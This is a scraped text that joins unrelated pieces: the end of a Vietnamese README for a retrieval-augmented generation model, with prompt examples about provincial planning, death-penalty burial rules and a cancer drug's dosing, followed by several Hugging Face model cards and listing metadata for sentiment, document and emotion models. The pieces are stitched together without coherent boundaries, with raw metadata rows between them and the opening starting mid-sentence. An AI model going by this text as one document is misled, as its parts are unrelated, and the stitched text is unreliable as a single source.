chế biến, chế tạo, dịch vụ, du lịch và văn hóa phía Nam của vùng; trung tâm lớn của cả nước về phát triển kinh tế biển; trọng điểm du lịch quốc gia và quốc tế với hệ thống kết cấu hạ tầng kinh tế đồng bộ, hiện đại; kinh tế của tỉnh phát triển nhanh, bền vững và xanh dựa trên các trụ cột tăng trưởng công nghiệp, dịch vụ du lịch, cảng biển - logistics; nông nghiệp ứng dụng công nghệ cao; đô thị hóa; thực hiện thành công các mục tiêu chuyển đổi số, đổi mới sáng tạo, cải thiện mạnh mẽ môi trường đầu tư kinh doanh, trở thành điểm đến đầu tư hấp dẫn của các doanh nghiệp lớn trong và ngoài nước; chỉ số năng lực cạnh tranh cấp tỉnh thuộc nhóm cao của cả nước; kết cấu hạ tầng kinh tế - xã hội đồng bộ, hiện đại, hệ thống đô thị phát triển theo hướng đô thị thông minh, kết nối thuận tiện với các trung tâm kinh tế của vùng, cả nước và quốc tế.
- Ngữ cảnh 3: . Chủ tịch UBND tỉnh Quảng Ninh cho biết, tỉnh đặt mục tiêu hướng đến năm 2030 trở thành một tỉnh tiêu biểu của cả nước về mọi mặt; tỉnh kiểu mẫu giàu đẹp, văn minh, hiện đại, nâng cao đời sống mọi mặt của nhân dân; cực tăng trưởng của khu vực phía Bắc, một trong những trung tâm phát triển năng động, toàn diện; trung tâm du lịch quốc tế, trung tâm kinh tế biển, cửa ngõ của Vùng kinh tế trọng điểm Bắc Bộ và cả nước. Để đạt được những mục tiêu trên, tỉnh Quảng Ninh xác định sự đóng góp, quan tâm của cộng đồng doanh nghiệp, nhất là các doanh nghiệp hàng đầu Việt Nam “các sếu đầu đàn” là một trong những yếu tố then chốt quyết định. Do vậy, tỉnh Quảng Ninh rất mong nhận được sự quan tâm, nghiên cứu đầu tư hợp tác của các Doanh nghiệp hàng đầu Việt Nam trong thời gian tới, nhất là trong việc đầu tư các dự án có hàm lượng công nghệ cao, công nghệ tiên tiến, quản trị hiện đại, giá trị gia tăng cao, có tác động lan tỏa. Tỉnh Quảng Ninh cam kết tạo điều kiện thuận lợi nhất cho doanh nghiệp phát triển hơn nữa khi đầu tư kinh doanh trên địa bàn tỉnh; cam kết đồng hành, lắng nghe tiếng nói của cộng đồng doanh nghiệp, các nhà đầu tư; cùng trăn trở, trách nhiệm, giải quyết thấu đáo, vào cuộc thực chất, hiệu quả đối với từng khó khăn, vướng mắc với mục tiêu tăng cường niềm tin và nâng cao sự hài lòng của cá nhân, tổ chức, doanh nghiệp là thước đo đánh giá chất lượng phục vụ, chất lượng điều hành của cơ quan hành chính nhà nước từ cấp tỉnh đến các cấp cơ sở. Tỉnh Quảng Ninh sẽ triển khai một cách hiệu quả nhất Quy hoạch tỉnh, quy hoạch các địa phương; chuẩn bị mặt bằng sạch; quỹ đất tái định cư; đảm bảo nguồn cung điện, nước và viễn thông theo yêu cầu; xây dựng các chính sách đột phá để thu hút nguồn nhân lực chất lượng cao thông qua việc cải thiện nhà ở và cơ sở văn hóa để đảm bảo đời sống vật chất và tinh thần cho người lao động. Đồng thời bảo vệ quyền và lợi ích chính đáng, hợp pháp của nhà đầu tư, doanh nghiệp vào tỉnh; bảo đảm hài hòa lợi ích giữa nhà nước, nhà đầu tư, người lao động và người dân.'''
question = '''Theo quy hoạch tỉnh Tây Ninh thời kỳ 2021 - 2030, tầm nhìn đến năm 2050, tỉnh sẽ tập trung phát triển công nghiệp và dịch vụ du lịch. Trong bối cảnh cạnh tranh với các tỉnh lân cận, yếu tố nào được coi là quan trọng nhất để Tây Ninh có thể thu hút đầu tư và phát triển nhanh, toàn diện và bền vững?'''
'''Trả lời:
Trong ngữ cảnh được cung cấp, không có thông tin về quy hoạch tỉnh Tây Ninh thời kỳ 2021 - 2030, tầm nhìn đến năm 2050. Do đó, không có câu trả lời chính xác dựa trên các thông tin đã cung cấp. Nếu bạn có thêm thông tin về quy hoạch tỉnh Tây Ninh, vui lòng cung cấp để tôi có thể trả lời câu hỏi một cách chính xác và đầy đủ.
'''
```
#### 4. Tích hợp thông tin
```python
context = '''- Ngữ cảnh 1: 43/2020/nđ-cp Điều 3. Chế độ, chính sách đối với người tham gia thi hành án tử hình\n1. Người tham gia Đội thi hành án tử hình được hưởng chế độ bồi dưỡng bằng ba lần mức lương cơ sở khi thi hành án tử hình đối với 01 người và nghỉ dưỡng 10 ngày theo quy định chung về chế độ nghỉ dưỡng đối với cán bộ, chiến sĩ Công an nhân dân, Quân đội nhân dân.\n2. Người tham gia Hội đồng thi hành án tử hình, cán bộ quản giáo, người ghi âm, ghi hình, chụp ảnh, phiên dịch, thực hiện lăn tay người bị thi hành án tử hình, khâm liệm, mai táng tử thi được hưởng chế độ bồi dưỡng bằng một lần mức lương cơ sở khi thi hành án tử hình đối với 01 người.\n3. Người tham gia bảo đảm an ninh, trật tự; đại diện Ủy ban nhân dân cấp xã; Điều tra viên được hưởng chế độ bồi dưỡng bằng một phần hai mức lương cơ sở khi thi hành án tử hình đối với 01 người.
- Ngữ cảnh 2: 53/2010/qh12 Điều 60. Giải quyết việc xin nhận tử thi, hài cốt của người bị thi hành án tử hình\n1. Việc giải quyết nhận tử thi được thực hiện như sau:\na) Trước khi thi hành án tử hình, thân nhân hoặc người đại diện hợp pháp của người chấp hành án được làm đơn có xác nhận của Ủy ban nhân dân cấp xã nơi cư trú gửi Chánh án Tòa án đã xét xử sơ thẩm đề nghị giải quyết cho nhận tử thi của người chấp hành án để an táng; trường hợp người chấp hành án là người nước ngoài thì đơn phải có xác nhận của cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người chấp hành án mang quốc tịch và phải được dịch ra tiếng Việt. Đơn phải ghi rõ họ tên, địa chỉ người nhận tử thi, quan hệ với người chấp hành án; cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí;\nb) Chánh án Tòa án đã xét xử sơ thẩm thông báo bằng văn bản cho người có đơn đề nghị về việc cho nhận tử thi hoặc không cho nhận tử thi khi có căn cứ cho rằng việc nhận tử thi ảnh hưởng đến an ninh, trật tự, vệ sinh môi trường. Trường hợp người chấp hành án là người nước ngoài, thì Chánh án Tòa án đã xét xử sơ thẩm có trách nhiệm thông báo bằng văn bản cho Bộ Ngoại giao Việt Nam để thông báo cho cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người đó mang quốc tịch;\nc) Cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm thông báo cho người có đơn đề nghị ngay sau khi thi hành án để đến nhận tử thi về an táng. Việc giao nhận tử thi phải được thực hiện trong thời hạn 24 giờ kể từ khi thông báo và phải lập biên bản, có chữ ký của các bên giao, nhận; hết thời hạn này mà người có đơn đề nghị không đến nhận tử thi thì cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm an táng.\n2. Trường hợp không được nhận tử thi hoặc thân nhân của người bị thi hành án không có đơn đề nghị được nhận tử thi về an táng thì cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu tổ chức việc an táng. Sau 03 năm kể từ ngày thi hành án, thân nhân hoặc đại diện hợp pháp của người đã bị thi hành án được làm đơn có xác nhận của Ủy ban nhân dân cấp xã nơi cư trú đề nghị Cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu nơi đã thi hành án cho nhận hài cốt. Đơn đề nghị phải ghi rõ họ tên, địa chỉ người nhận hài cốt, quan hệ với người bị thi hành án; cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí. Trong thời hạn 07 ngày, kể từ ngày nhận được đơn, cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm xem xét, giải quyết.\nTrường hợp người bị thi hành án là người nước ngoài thì đơn đề nghị phải có xác nhận của cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người bị thi hành án mang quốc tịch và phải được dịch ra tiếng Việt. Việc giải quyết cho nhận hài cốt do cơ quan quản lý thi hành án hình sự xem xét, quyết định.
- Ngữ cảnh 3: 53/2010/qh12 Điều 57. Chế độ quản lý giam giữ, ăn, ở, mặc, sinh hoạt, gửi và nhận thư, nhận đồ vật, tiền mặt, gặp thân nhân, chăm sóc y tế\nChế độ quản lý giam giữ, ăn, ở, mặc, sinh hoạt, gửi và nhận thư, nhận đồ vật, tiền mặt, gặp thân nhân, chăm sóc y tế đối với người bị kết án tử hình trong thời gian chờ thi hành án thực hiện theo quy định của pháp luật về tạm giam.
- Ngữ cảnh 4: 82/2011/nđ-cp Điều 9. Chi phí mai táng\nChi phí mai táng người bị thi hành án tử hình bao gồm: 01 quan tài bằng gỗ thường, 01 bộ quần áo thường, 04 m vải liệm, hương, nến, rượu, cồn để làm vệ sinh khi liệm tử thi và các chi phí mai táng khác.\nTrường hợp thân nhân hoặc người đại diện hợp pháp của người bị kết án tử hình được nhận tử thi về mai táng thì phải tự chịu chi phí đưa di chuyển tử thi và phải cam kết chấp hành đúng quy định của pháp luật về bảo đảm an ninh, trật tự.
- Ngữ cảnh 5: 82/2011/nđ-cp Điều 5. Chế độ, chính sách đối với người tham gia thi hành án tử hình\n1. Người tham gia Đội thi hành án tử hình và bác sĩ xác định tĩnh mạch được hưởng chế độ bồi dưỡng bằng hai lần mức lương tối thiểu chung cho mỗi lần thi hành án và được nghỉ dưỡng 10 ngày theo quy định chung về chế độ nghỉ dưỡng đối với cán bộ, chiến sĩ Công an nhân dân, Quân đội nhân dân.\n2. Người tham gia Hội đồng thi hành án tử hình, bác sĩ pháp y, cán bộ chuyên môn, người thực hiện lăn tay người bị thi hành án tử hình, khâm liệm, an táng tử thi được hưởng chế độ bồi dưỡng bằng một lần mức lương tối thiểu chung quy định cho mỗi lần thi hành án.\n3. Những người tham gia khác được hưởng chế độ bồi dưỡng bằng một phần hai mức lương tối thiểu cho mỗi lần thi hành án.'''
question = '''Tử tù chết sau khi tiêm thuốc độc mà không có thân nhân nhận xác thì được hỗ trợ mai táng như thế nào?'''
'''Trả lời:
Dựa trên ngữ cảnh 2 (53/2010/qh12 Điều 60), nếu tử tù chết sau khi tiêm thuốc độc mà không có thân nhân nhận xác, thì cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu sẽ tổ chức việc an táng. Cụ thể:
1. **An táng**: Cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu sẽ chịu trách nhiệm an táng tử tù nếu không có thân nhân hoặc người đại diện hợp pháp đề nghị nhận tử thi.
2. **Hài cốt sau 3 năm**: Sau 3 năm kể từ ngày thi hành án, nếu thân nhân hoặc đại diện hợp pháp của người đã bị thi hành án vẫn chưa đề nghị nhận hài cốt, họ có thể làm đơn đề nghị Cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu nơi đã thi hành án cho nhận hài cốt. Đơn đề nghị phải ghi rõ họ tên, địa chỉ người nhận hài cốt, quan hệ với người bị thi hành án, cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí.
3. **Chi phí mai táng**: Theo ngữ cảnh 4 (82/2011/nđ-cp Điều 9), chi phí mai táng bao gồm:
- 01 quan tài bằng gỗ thường.
- 01 bộ quần áo thường.
- 04 m vải liệm.
- Hương, nến, rượu, cồn để làm vệ sinh khi liệm tử thi.
- Các chi phí mai táng khác.
Nếu thân nhân hoặc người đại diện hợp pháp đề nghị nhận tử thi về mai táng, họ phải tự chịu chi phí đưa di chuyển tử thi và cam kết chấp hành đúng quy định của pháp luật về bảo đảm an ninh, trật tự.
'''
```
- Ngữ cảnh 2 và ngữ cảnh 4 có chứa phần thông tin cho việc trả lời câu hỏi.
### 5.Xác định positive/negative
```python
system_prompt = "Bạn là một trợ lí Tiếng Việt nhiệt tình và trung thực. Hãy luôn trả lời một cách hữu ích nhất có thể."
template = '''Hãy xác định xem ngữ cảnh có chứa đầy đủ thông tin để trả lời câu hỏi hay không.
Chỉ cần đưa ra 1 trong 2 đáp án trong phần trả lời là "Có" hoặc "Không".
### Ngữ cảnh :
{context}
### Câu hỏi :
{question}
### Trả lời :'''
context = '''Công dụng thuốc Xelocapec Capecitabine là một hoạt chất gây độc chọn lọc với tế bào ung thư. Hoạt chất này có trong thuốc Xelocapec. Vậy thuốc Xelocapec có tác dụng gì và cần lưu ý những vấn đề nào khi điều trị bằng sản phẩm này? 1. Xelocapec là thuốc gì? Xelocapec chứa hoạt chất Capecitabine hàm lượng 500mg. Thuốc Xelocapec bào chế dạng viên nén bao phim và đóng gói mỗi hộp 3 vỉ x 10 viên. Xelocapec chứa hoạt chất Capecitabine là một dẫn chất Fluoropyrimidine carbamate với tác dụng gây độc chọn lọc với các tế bào ung thư . Mặc dù trên in vitro Capecitabine không cho thấy tác dụng độc tế bào nhưng trên in vivo, Xelocapec biến đổi liên tiếp thành chất gây độc tế bào là 5-fluorouracil (5-FU). Sự hình thành 5-FU tại khối u thông qua xúc tác một cách tối ưu của yếu tố tạo mạch liên quan là Thymidine phosphorylase, qua đó hạn chế tối đa mức độ ảnh hưởng đến nhu mô lành của 5-FU. 2. Thuốc Xelocapec có tác dụng gì? Thuốc Xelocapec được chỉ định điều trị đơn lẻ hoặc kết hợp với các liệu pháp điều trị ung thư. Xelocapec làm chậm hoặc ngăn chặn sự tăng trưởng của tế bào ung thư, do đó giảm kích thước khối u trong những trường hợp sau: Ung thư vú : Xelocapec phối hợp với Docetaxel được chỉ định điều trị ung thư vú thể tiến triển tại chỗ hoặc di căn sau khi đã thất bại với liệu pháp hóa trị; Ung thư đại trực tràng : Xelocapec được chỉ định hỗ trợ điều trị ung thư đại tràng sau phẫu thuật hoặc ung thư đại trực tràng di căn; Ung thư dạ dày : Xelocapec phối hợp với hợp chất platin được chỉ định điều trị khởi đầu cho những bệnh nhân ung thư dạ dày. Chống chỉ định của thuốc Xelocapec : Bệnh nhân quá mẫn cảm với Capecitabine hay các thành phần khác có trong Xelocapec ; Người có tiền sử gặp các phản ứng không mong muốn nghiêm trọng khi điều trị với Fluoropyrimidine; Người đang mang thai hoặc cho con bú; Suy thận nặng (độ thanh thải Creatinin <30mL/phút); Bệnh nhân đang điều trị ung thư với Sorivudin hoặc chất tương tự về mặt hóa học như Brivudin; Bệnh nhân thiếu hụt Dihydropyrimidin dehydrogenase; Bệnh nhân giảm số lượng bạch cầu hoặc tiểu cầu nặng; Suy gan nặng. 3. Liều dùng của thuốc Xelocapec Liều dùng của Xelocapec khi điều trị đơn lẻ: Ung thư đại trực tràng, ung thư vú: 1250mg/m2, uống 2 lần mỗi ngày trong thời gian 14 ngày, tiếp sau đó là 7 ngày ngưng thuốc. Liều Xelocapec trong điều trị phối hợp: Ung thư vú: Liều khởi đầu là 1250mg/m2, 2 lần uống mỗi ngày trong 2 tuần dùng phối hợp với Docetaxel, tiếp sau đó lá 1 tuần ngưng thuốc; Ung thư dạ dày, đại trực tràng: Liều khuyến cáo là 800-1000mg/m2/lần x 2 lần/ngày trong thời gian 2 tuần, sau đó 7 ngày ngưng thuốc hoặc 625mg/m2/lần x 2 lần mỗi ngày khi điều trị liên tục. Thuốc Xelocapec nên uống cùng với thức ăn, do đó thời điểm tốt nhất là trong vòng 30 phút sau bữa ăn. 4. Tác dụng phụ của thuốc Xelocapec Các triệu chứng bất thường như buồn nôn, nôn ói, giảm cảm giác ngon miệng, táo bón, cơ thể mệt mỏi, yếu sức, đau đầu, chóng mặt, khó ngủ có thể xảy ra trong thời gian dùng Xelocapec . Trong đó, tình trạng buồn nôn và nôn ói có thể nghiêm trọng nên đôi khi cần được bác sĩ chỉ định thuốc kiểm soát phù hợp. Tiêu chảy là một tác dụng phụ phổ biến khác của thuốc Xelocapec . Bệnh nhân cần uống nhiều nước khi điều trị bằng Xelocapec trừ khi bác sĩ có hướng dẫn khác. Nôn ói hoặc tiêu chảy kéo dài do thuốc Xelocapec có thể dẫn đến mất nước nghiêm trọng, vì vậy người bệnh hãy liên hệ ngay với bác sĩ nếu có các triệu chứng mất nước như giảm đi tiểu, khô miệng, tăng cảm giác khát nước hoặc chóng mặt. Tình trạng rụng tóc tạm thời xảy ra trong thời gian dùng thuốc Xelocapec và có thể hồi phục sau khi điều trị đã kết thúc. Một số bệnh nhân ghi nhận hiện tượng thay đổi móng tay tạm thời. Đối với nam giới và phụ nữ trong độ tuổi sinh đẻ, thuốc Xelocapec có thể ảnh hưởng đến khả năng có con của bệnh nhân. Bệnh nhân hãy tham khảo ý kiến bác sĩ để biết thêm chi tiết. Thuốc Xelocapec có thể làm giảm khả năng miễn dịch của cơ thể với các tác nhân nhiễm trùng, dẫn đến tăng nguy cơ mắc các bệnh nhiễm trùng nghiêm trọng (nhưng hiếm khi gây tử vong) hoặc làm cho bệnh nhiễm trùng hiện mắc nghiêm trọng hơn. Phản ứng dị ứng rất nghiêm trọng với thuốc Xelocapec rất hiếm khi xảy ra. Tuy nhiên, bệnh nhân hãy liên hệ với bác sĩ ngay lập tức nếu xuất hiện các triệu chứng của phản ứng dị ứng nghiêm trọng như phát ban, sưng ngứa mặt/lưỡi/họng, chóng mặt nghiêm trọng hoặc khó thở. 5. Tương tác thuốc của Xelocapec Hoạt chất Capecitabine trong thuốc Xelocapec có thể xảy ra tương tác thuốc nghiêm trọng với một số thuốc sau: Thuốc chống đông máu Coumarin: Trong một nghiên cứu tương tác lâm sàng, sau khi dùng Warfarin liều đơn 20mg kết hợp với Capecitabine làm tăng AUC của S-warfarin khoảng 57% và giá trị INR tăng 91%.'''
question = '''Tại sao Capecitabine trong Xelocapec không gây độc tế bào trên in vitro nhưng lại biến đổi thành 5-fluorouracil (5-FU) gây độc tế bào trên in vivo, và cơ chế nào giúp hạn chế ảnh hưởng đến nhu mô lành của 5-FU?'''
'''Trả lời: Có'''
```
**Developer**
Member: Nguyễn Nho Trung, Nguyễn Nhật Quang
## Contact
**Email**: [email protected]
**LinkedIn**: [Trung Nguyen Nho](https://www.linkedin.com/in/trung-nguyen-nho-604288227/)
**Facebook**: [Nguyễn Nho Trung](https://www.facebook.com/trung.nguyennho.568/)
## Support me:
Nếu bạn thấy tác phẩm này hữu ích và muốn hỗ trợ cho sự phát triển liên tục của nó, đây là một số cách bạn có thể giúp:
**Star the Repository**: Nếu bạn đánh giá cao tác phẩm này, vui lòng gắn sao cho nó. Sự hỗ trợ của bạn sẽ khuyến khích sự phát triển và cải tiến liên tục.
**Contribute**: Đóng góp luôn được hoan nghênh! Bạn có thể giúp bằng cách báo cáo sự cố, gửi yêu cầu kéo hoặc đề xuất các tính năng mới.
**Share**: Chia sẻ dự án này với đồng nghiệp, bạn bè hoặc cộng đồng của bạn. Càng nhiều người biết về nó, nó càng thu hút được nhiều phản hồi và đóng góp
**Buy me a coffee**: Nếu bạn muốn hỗ trợ tài chính, hãy cân nhắc donation. Bạn có thể donate qua:
- BIDV: 2131273046 - NGUYEN NHO TRUNG
## Citation
Làm ơn cite như sau:
```Plaintext
@misc{ViRAG-Gen,
title={ViRAG-Gen: Towards a specialized LLM for RAG task in Vietnamese language.}},
author={Nguyen Nho Trung, Nguyen Nhat Quang},
year={2024},
publisher={Huggingface},
}
```
|
rytsar/finetuning-sentiment-model-3000-samples | rytsar | 2024-10-10T07:45:20Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T06:00:28Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: finetuning-sentiment-model-3000-samples
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuning-sentiment-model-3000-samples
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3237
- Accuracy: 0.8667
- F1: 0.8667
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
yikai04/DonutCORD-Ver3.0 | yikai04 | 2024-10-10T07:13:27Z | 51 | 0 | transformers | [
"transformers",
"safetensors",
"vision-encoder-decoder",
"image-text-to-text",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | image-text-to-text | 2024-10-08T08:35:56Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Rasooli3003/Bert-Sentiment-Fa | Rasooli3003 | 2024-10-10T06:59:37Z | 9 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:farshadafx/Bert-Sentiment-Fa",
"base_model:finetune:farshadafx/Bert-Sentiment-Fa",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-09-05T05:35:11Z | ---
library_name: transformers
license: apache-2.0
base_model: farshadafx/Bert-Sentiment-Fa
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: Bert-Sentiment-Fa
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Bert-Sentiment-Fa
This model is a fine-tuned version of [farshadafx/Bert-Sentiment-Fa](https://huggingface.co/farshadafx/Bert-Sentiment-Fa) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.4623
- Accuracy: 0.4783
- F1: 0.4829
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|
| No log | 1.0 | 52 | 1.0841 | 0.4130 | 0.1949 |
| No log | 2.0 | 104 | 1.0502 | 0.4565 | 0.3982 |
| No log | 3.0 | 156 | 1.1478 | 0.5 | 0.5102 |
| No log | 4.0 | 208 | 1.2943 | 0.4783 | 0.4974 |
| No log | 5.0 | 260 | 1.4623 | 0.4783 | 0.4829 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
ggcristian/TinyEmo-CLIP-Phi-2 | ggcristian | 2024-10-10T06:58:33Z | 10 | 0 | null | [
"tinyemo",
"emotion",
"visual emotion recognition",
"affective computing",
"emotional classification",
"metric learning",
"image-classification",
"en",
"arxiv:2410.07062",
"arxiv:2310.12062",
"base_model:microsoft/phi-2",
"base_model:finetune:microsoft/phi-2",
"region:us"
] | image-classification | 2024-10-02T08:05:32Z | ---
language:
- en
base_model:
- openai/clip-vit-large-patch14
- microsoft/phi-2
pipeline_tag: image-classification
tags:
- emotion
- visual emotion recognition
- affective computing
- emotional classification
- metric learning
---
# TinyEmo-CLIP-Phi-2
[[Paper]](https://arxiv.org/abs/2410.07062)
[TinyEmo GitHub repo](https://github.com/ggcr/TinyEmo)
[Metric Projector Card] [TinyEmo MM-LLM Card]
[[Reasoning Pre-training Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-Pretrain-525k) [[Reasoning Fine-tuning Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReason-175k) [[Reasoning Claude Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReasonHQ-Claude-1.4k)
TinyEmo is a family of small multi-modal language models for emotional reasoning and classification. Our
approach features: (1) a synthetic emotional instruct dataset for both pre-training and fine-tuning stages, (2) a Metric Projector
that delegates classification from the language model allowing for more efficient training and inference, (3) a multi-modal large
language model (MM-LLM) for emotional reasoning, and (4) a semi-automated framework for bias detection. TinyEmo is able to
perform emotion classification and emotional reasoning, all while using substantially fewer parameters than comparable models.
This efficiency allows us to freely incorporate more diverse emotional datasets, enabling strong performance on classification tasks,
with our smallest model (700M parameters) outperforming larger state-of-the-art models based on general-purpose MM-LLMs
with over 7B parameters. Additionally, the Metric Projector allows for interpretability and indirect bias detection in large models
without additional training, offering an approach to understand and improve AI systems.
## Installation and Requirements
1. Clone this repository and navigate to the root of the project:
```
git clone https://github.com/ggcr/TinyEmo.git
cd TinyEmo
```
2. Create an environment and install dependencies:
```
conda create -n projector_mps python=3.10 -y
conda activate projector_mps
pip install --upgrade pip # enable PEP 660 support
pip install -e projector_mps/.
```
## Quickstart
### Metric Projector inference
We provide precomputed CLIP features for the Emotion6 dataset, and you can evaluate them using two methods:
#### Our Projectors from Hugging Face
To evaluate the projectors from Hugging Face, use the [scripts/eval.sh](https://github.com/ggcr/TinyEmo/blob/main/projector_mps/scripts/eval.sh) script:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval.sh
```
Below is a table of the available projectors:
| Model Architecture | Parameters | Zero-shot Accuracy | HuggingFace Link |
|----------------------------------------| ---------- |--------------------|----------------------------------------------------------------------|
| CLIP ViT-L/14 + OpenELM-270M-I | 0.70B | 57.87% | [HF Projector 0.70B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-270M) |
| CLIP ViT-L/14 + OpenELM-450M-I | 0.88B | 55.24% | [HF Projector 0.88B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-450M) |
